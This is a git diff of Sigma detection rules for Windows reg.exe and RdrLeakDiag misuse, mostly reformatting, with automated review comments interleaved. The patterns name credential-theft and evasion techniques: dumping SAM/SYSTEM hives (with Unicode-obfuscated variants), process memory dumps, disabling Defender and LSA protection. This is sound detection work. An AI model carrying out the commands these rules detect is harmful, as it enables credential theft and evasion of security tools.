+++ b/sigma/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml @@ -1,18 +1,16 @@ title: Process Memory Dump via RdrLeakDiag.EXE id: edadb1e5-5919-4e4c-8462-a9e643b02c4b related: - - id: 6355a919-2e97-4285-a673-74645566340d - type: obsoletes + - id: 6355a919-2e97-4285-a673-74645566340d + type: obsoletes status: test -description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool - "rdrleakdiag.exe" to dump process memory +description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory references: - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/ - https://twitter.com/0gtweet/status/1299071304805560321?s=21 -author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, - Nasreddine Bencherchali (Nextron Systems) +author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2021/09/24 modified: 2023/04/24 tags: @@ -26,23 +24,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rdrleakdiag.exe - - OriginalFileName: RdrLeakDiag.exe + - NewProcessName|endswith: \rdrleakdiag.exe + - OriginalFileName: RdrLeakDiag.exe selection_cli_dump: - CommandLine|contains: + CommandLine|contains: - fullmemdmp - /memdmp - -memdmp selection_cli_output: - CommandLine|contains: + CommandLine|contains: - ' -o ' - ' /o ' selection_cli_process: - CommandLine|contains: + CommandLine|contains: - ' -p ' - ' /p ' - condition: process_creation and (all of selection_cli_* or (selection_img and - selection_cli_dump)) + condition: process_creation and (all of selection_cli_* or (selection_img and selection_cli_dump)) falsepositives: - Unknown level: high 
diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_add_run_key.yml b/sigma/builtin/process_creation/proc_creation_win_reg_add_run_key.yml index 2efe20039..726135f2f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_add_run_key.yml @@ -1,8 +1,7 @@ title: Potential Persistence Attempt Via Run Keys Using Reg.EXE id: de587dce-915e-4218-aac4-835ca6af6f70 status: test -description: Detects suspicious command line reg.exe tool adding key to RUN key in - Registry +description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry references: - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/ - https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys @@ -20,14 +19,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - reg - ' ADD ' - Software\Microsoft\Windows\CurrentVersion\Run condition: process_creation and selection falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reasons. + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. - Discord level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml b/sigma/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml index 3bf1728a9..7d73869fd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml 
@@ -1,12 +1,10 @@ title: Add SafeBoot Keys Via Reg Utility id: d7662ff6-9e97-4596-a61d-9839e32dee8d related: - - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de - type: similar + - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de + type: similar status: test -description: Detects execution of "reg.exe" commands with the "add" or "copy" flags - on safe boot registry keys. Often used by attacker to allow the ransomware to - work in safe mode as some security products do not +description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not references: - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: reg.exe + - OriginalFileName: reg.exe selection_safeboot: - CommandLine|contains: \SYSTEM\CurrentControlSet\Control\SafeBoot + CommandLine|contains: \SYSTEM\CurrentControlSet\Control\SafeBoot selection_flag: - CommandLine|contains: + CommandLine|contains: - ' copy ' - ' add ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_bitlocker.yml b/sigma/builtin/process_creation/proc_creation_win_reg_bitlocker.yml index fc98c8723..af32ff497 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_bitlocker.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_bitlocker.yml 
@@ -1,8 +1,7 @@ title: Suspicious Reg Add BitLocker id: 0e0255bf-2548-47b8-9582-c0955c9283f5 status: test -description: Detects suspicious addition to BitLocker related registry keys via the - reg.exe utility +description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility references: - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/ author: frack113 @@ -19,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - REG - ADD - \SOFTWARE\Policies\Microsoft\FVE - /v - /f - CommandLine|contains: + CommandLine|contains: - EnableBDEWithNoTPM - UseAdvancedStartup - UseTPM diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml b/sigma/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml index 44cdd06a0..7da8ea400 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml @@ -1,8 +1,7 @@ title: Dropping Of Password Filter DLL id: b7966f4a-b333-455b-8370-8ca53c229762 status: test -description: Detects dropping of dll files in system32 that may be used to retrieve - user credentials from LSASS +description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS references: - https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/ - https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection_cmdline: - CommandLine|contains|all: + CommandLine|contains|all: - HKLM\SYSTEM\CurrentControlSet\Control\Lsa - scecli\0* - reg add 
diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml b/sigma/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml index 95af7a388..4bb15a40b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml @@ -1,9 +1,7 @@ title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE id: 48917adc-a28e-4f5d-b729-11e75da8941f status: test -description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot - has been seen using this technique to add exclusions for folders within AppData - and ProgramData. +description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - https://redcanary.com/threat-detection-report/threats/qbot/ @@ -21,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths - SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths - CommandLine|contains|all: + CommandLine|contains|all: - 'ADD ' - '/t ' - 'REG_DWORD ' - '/v ' - '/d ' - '0' - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml b/sigma/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml index b2d62ee41..0d7acf9a9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml 
@@ -1,12 +1,10 @@ title: SafeBoot Registry Key Deleted Via Reg.EXE id: fc0e89b5-adb0-43c1-b749-c12a10ec37de related: - - id: d7662ff6-9e97-4596-a61d-9839e32dee8d - type: similar + - id: d7662ff6-9e97-4596-a61d-9839e32dee8d + type: similar status: test -description: Detects execution of "reg.exe" commands with the "delete" flag on safe - boot registry keys. Often used by attacker to prevent safeboot execution of security - products +description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton @@ -23,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: reg.exe + - OriginalFileName: reg.exe selection_delete: - CommandLine|contains|all: + CommandLine|contains|all: - ' delete ' - \SYSTEM\CurrentControlSet\Control\SafeBoot condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_delete_services.yml b/sigma/builtin/process_creation/proc_creation_win_reg_delete_services.yml index 430569bf4..58a884806 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_delete_services.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_delete_services.yml 
@@ -1,8 +1,7 @@ title: Service Registry Key Deleted Via Reg.EXE id: 05b2aa93-1210-42c8-8d9a-2fcc13b284f5 status: test -description: Detects execution of "reg.exe" commands with the "delete" flag on services - registry key. Often used by attacker to remove AV software services +description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services references: - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +18,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: reg.exe + - OriginalFileName: reg.exe selection_delete: - CommandLine|contains: ' delete ' + CommandLine|contains: ' delete ' selection_key: - CommandLine|contains: \SYSTEM\CurrentControlSet\services\ + # Add specific services if you would like the rule to be more specific + CommandLine|contains: \SYSTEM\CurrentControlSet\services\ condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml b/sigma/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml index bf7be2e76..8105dc84c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml 
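Review bot: `# Add specific services if you would like the rule to be more specific` says what to do but not how; since `selection_key` is a single `CommandLine|contains` string, tuning means replacing it with a list of full key paths, which the comment could show: `# Tuning: replace the prefix below with a list of full paths, e.g. \SYSTEM\CurrentControlSet\services\<service-name>`. Placing the hint on the value line rather than between `selection_key:` and its child keeps the selection readable once that list grows.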
@@ -1,16 +1,12 @@ title: Potentially Suspicious Desktop Background Change Using Reg.EXE id: 8cbc9475-8d05-4e27-9c32-df960716c701 related: - - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae - type: similar + - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae + type: similar status: experimental -description: 'Detects the execution of "reg.exe" to alter registry keys that would - replace the user''s desktop background. - - This is a common technique used by malware to change the desktop background to - a ransom note or other image. - - ' +description: | + Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. + This is a common technique used by malware to change the desktop background to a ransom note or other image. references: - https://www.attackiq.com/2023/09/20/emulating-rhysida/ - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ 
@@ -29,35 +25,34 @@ logsource: product: windows category: process_creation detection: + # TODO: Improve this to also focus on variation using PowerShell and other CLI tools process_creation: EventID: 4688 Channel: Security selection_reg_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_reg_flag: - CommandLine|contains: add + CommandLine|contains: add selection_keys: - CommandLine|contains: + CommandLine|contains: - Control Panel\Desktop - CurrentVersion\Policies\ActiveDesktop - CurrentVersion\Policies\System selection_cli_reg_1: - CommandLine|contains|all: + CommandLine|contains|all: - /v NoChangingWallpaper - - /d 1 + - /d 1 # Prevent changing desktop background selection_cli_reg_2: - CommandLine|contains|all: + CommandLine|contains|all: - /v Wallpaper - /t REG_SZ selection_cli_reg_3: - CommandLine|contains|all: + CommandLine|contains|all: - /v WallpaperStyle - - /d 2 - condition: process_creation and (all of selection_reg_* and selection_keys and - 1 of selection_cli_reg_*) + - /d 2 # Stretch + condition: process_creation and (all of selection_reg_* and selection_keys and 1 of selection_cli_reg_*) falsepositives: - - Administrative scripts that change the desktop background to a company logo - or other image. + - Administrative scripts that change the desktop background to a company logo or other image. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml b/sigma/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml index ba3a21cc6..fdc873296 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml 
@@ -1,8 +1,7 @@ title: Direct Autorun Keys Modification id: 24357373-078f-44ed-9ac4-6d334a668a11 status: test -description: Detects direct modification of autostart extensibility point (ASEP) in - registry using reg.exe. +description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: add - NewProcessName|endswith: \reg.exe + CommandLine|contains: add # to avoid intersection with discovery tactic rules + NewProcessName|endswith: \reg.exe selection_2: - CommandLine|contains: - - \software\Microsoft\Windows\CurrentVersion\Run + CommandLine|contains: # need to improve this list, there are plenty of ASEP reg keys + - \software\Microsoft\Windows\CurrentVersion\Run # Also covers the strings "RunOnce", "RunOnceEx", "RunServices", "RunServicesOnce" - \software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit - \software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell - \software\Microsoft\Windows NT\CurrentVersion\Windows @@ -34,8 +33,7 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reasons. + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. - Discord level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml b/sigma/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml index 51148fe19..e2d38ed7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml 
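Review bot: The inline comment `# need to improve this list, there are plenty of ASEP reg keys` on `selection_2` is an open work item written as a plain remark; the desktop-background rule in this same commit marks the equivalent with `# TODO:`, so for consistency write `CommandLine|contains: # TODO: extend this list, there are many more ASEP registry keys`. The `# Also covers the strings "RunOnce", ...` note on the `\software\Microsoft\Windows\CurrentVersion\Run` entry is accurate for a `contains` modifier because each named key begins with that string, and the `# to avoid intersection with discovery tactic rules` comment on `CommandLine|contains: add` is a good explanation of why the write operation is required, which would otherwise be easy to misread as an over-broad match on the substring `add`.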
+++ b/sigma/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml @@ -1,8 +1,7 @@ title: Security Service Disabled Via Reg.EXE id: 5e95028c-5229-4214-afae-d653d573d0ec status: test -description: Detects execution of "reg.exe" to disable security services such as Windows - Defender. +description: Detects execution of "reg.exe" to disable security services such as Windows Defender. references: - https://twitter.com/JohnLaTwC/status/1415295021041979392 - https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1 @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_reg_add: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add selection_cli_reg_start: - CommandLine|contains|all: + CommandLine|contains|all: - d 4 - v Start - CommandLine|contains: + CommandLine|contains: - \AppIDSvc - \MsMpSvc - \NisSrv diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml b/sigma/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml index a00fb9530..f3abf9818 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml 
@@ -1,21 +1,19 @@ title: Dumping of Sensitive Hives Via Reg.EXE id: fd877b94-9bb5-4191-bb25-d79cbd93c167 related: - - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e - type: obsoletes - - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0 - type: obsoletes + - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e + type: obsoletes + - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0 + type: obsoletes status: test -description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. - This includes SAM, SYSTEM and SECURITY hives. +description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets -author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, - frack113 +author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113 date: 2019/10/22 modified: 2023/12/13 tags: 
@@ -32,32 +30,32 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli_flag: - CommandLine|contains: + CommandLine|contains: - ' save ' - ' export ' - - " \u02E2ave " - - " e\u02E3port " + - ' ˢave ' + - ' eˣport ' selection_cli_hklm: - CommandLine|contains: + CommandLine|contains: - hklm - - "hk\u02EAm" + - hk˪m - hkey_local_machine - - "hkey_\u02EAocal_machine" - - "hkey_loca\u02EA_machine" - - "hkey_\u02EAoca\u02EA_machine" + - hkey_˪ocal_machine + - hkey_loca˪_machine + - hkey_˪oca˪_machine selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - \system - \sam - \security - - "\\\u02E2ystem" - - "\\sy\u02E2tem" - - "\\\u02E2y\u02E2tem" - - "\\\u02E2am" - - "\\\u02E2ecurity" + - \ˢystem + - \syˢtem + - \ˢyˢtem + - \ˢam + - \ˢecurity condition: process_creation and (all of selection_*) falsepositives: - Dumping hives for legitimate purpouse i.e. backup or forensic investigation diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml b/sigma/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml index d8522fbb9..9488a7267 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml 
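Review bot: The obfuscated variants in `selection_cli_flag`, `selection_cli_hklm` and `selection_cli_hive` are now written as literal modifier letters (`ˢ`, `ˣ`, `˪`) instead of the `\u02E2`/`\u02E3`/`\u02EA` escapes the old side used, so a reader can no longer tell them apart from ASCII `s`, `x`, `l` without a hex view, and an editor or pipeline that normalizes or transcodes the file could silently alter them. A short comment preserving the code points keeps the intent reviewable, e.g. on the `selection_cli_flag` list key: `# Entries with U+02E2 / U+02E3 / U+02EA modifier letters are command-line obfuscation variants (see the wietzebeukema reference)`. Keeping the escaped spelling alongside the literal in the comment also lets a reviewer verify that the bytes did not change in transit.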
@@ -1,16 +1,10 @@ title: Enumeration for Credentials in Registry id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 status: test -description: 'Adversaries may search the Registry on compromised systems for insecurely - stored credentials. - - The Windows Registry stores configuration information that can be used by the - system or other programs. - - Adversaries may query the Registry looking for credentials and passwords that - have been stored for use by other programs or services - - ' +description: | + Adversaries may search the Registry on compromised systems for insecurely stored credentials. + The Windows Registry stores configuration information that can be used by the system or other programs. + Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md author: frack113 @@ -27,20 +21,20 @@ detection: EventID: 4688 Channel: Security reg: - CommandLine|contains|all: + CommandLine|contains|all: - ' query ' - '/t ' - REG_SZ - /s - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe hive: - - CommandLine|contains|all: - - '/f ' - - HKLM - - CommandLine|contains|all: - - '/f ' - - HKCU - - CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions + - CommandLine|contains|all: + - '/f ' + - HKLM + - CommandLine|contains|all: + - '/f ' + - HKCU + - CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions condition: process_creation and (reg and hive) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/sigma/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml index 392c86c8b..737dd9c0d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml @@ -1,11 +1,10 @@ title: Potential Suspicious Registry File Imported Via Reg.EXE id: 62e0298b-e994-4189-bc87-bc699aa62d97 related: - - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 - type: derived + - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 + type: derived status: test -description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' - utility +description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import author: frack113, Nasreddine Bencherchali @@ -22,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli: - CommandLine|contains: ' import ' + CommandLine|contains: ' import ' selection_paths: - CommandLine|contains: + CommandLine|contains: - C:\Users\ - '%temp%' - '%tmp%' diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml b/sigma/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml index adb21940b..8588a04b5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml 
@@ -1,19 +1,13 @@ title: RestrictedAdminMode Registry Value Tampering - ProcCreation id: 28ac00d6-22d9-4a3c-927f-bbd770104573 related: - - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 - type: similar + - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 # Registry + type: similar status: test -description: 'Detects changes to the "DisableRestrictedAdmin" registry value in order - to disable or enable RestrictedAdmin mode. - - RestrictedAdmin mode prevents the transmission of reusable credentials to the - remote system to which you connect using Remote Desktop. - - This prevents your credentials from being harvested during the initial connection - process if the remote server has been compromise - - ' +description: | + Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. + RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. + This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise references: - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx @@ -31,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control\Lsa\ - DisableRestrictedAdmin condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml b/sigma/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml index 1053db715..0c2e7c5bb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml 
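Review bot: The rewritten description still ends with `if the remote server has been compromise`; `compromised` is meant and the sentence has no terminating period, so since this commit reflows the text anyway the last line should read `This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.` The `# Registry` marker added on the related id is a helpful pointer to the registry-event variant; the NoLMHash rule further down in this commit uses the same marker, so the convention is consistent.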
@@ -1,8 +1,7 @@ title: LSA PPL Protection Disabled Via Reg.EXE id: 8c0eca51-0f88-4db2-9183-fdfb10c703f9 status: experimental -description: Detects the usage of the "reg.exe" utility to disable PPL protection - on the LSA process +description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ author: Florian Roth (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli: - CommandLine|contains: SYSTEM\CurrentControlSet\Control\Lsa - CommandLine|contains|all: + CommandLine|contains: SYSTEM\CurrentControlSet\Control\Lsa + CommandLine|contains|all: - ' add ' - ' /d 0' - ' /v RunAsPPL ' diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_machineguid.yml b/sigma/builtin/process_creation/proc_creation_win_reg_machineguid.yml index 4bac96704..0f3222a2d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_machineguid.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_machineguid.yml @@ -17,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - SOFTWARE\Microsoft\Cryptography - '/v ' - MachineGuid - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml b/sigma/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml index b21a9ba49..2a70c223f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml 
@@ -1,11 +1,10 @@ title: Modify Group Policy Settings id: ada4b0c4-758b-46ac-9033-9004613a150d related: - - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f - type: similar + - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f + type: similar status: test -description: Detect malicious GPO modifications can be used to implement many other - malicious behaviors. +description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md author: frack113 @@ -22,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection_reg: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_path: - CommandLine|contains: \SOFTWARE\Policies\Microsoft\Windows\System + CommandLine|contains: \SOFTWARE\Policies\Microsoft\Windows\System selection_key: - CommandLine|contains: + CommandLine|contains: - GroupPolicyRefreshTimeDC - GroupPolicyRefreshTimeOffsetDC - GroupPolicyRefreshTime diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_nolmhash.yml b/sigma/builtin/process_creation/proc_creation_win_reg_nolmhash.yml index 9592a1e3f..5c6028e88 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_nolmhash.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_nolmhash.yml 
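Review bot: The joined description in the first hunk is ungrammatical: `Detect malicious GPO modifications can be used to implement many other malicious behaviors.` Suggest `description: Detects malicious GPO modifications that can be used to implement many other malicious behaviors.` so it follows the "Detects ..." form used by the neighbouring rules in this patch.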
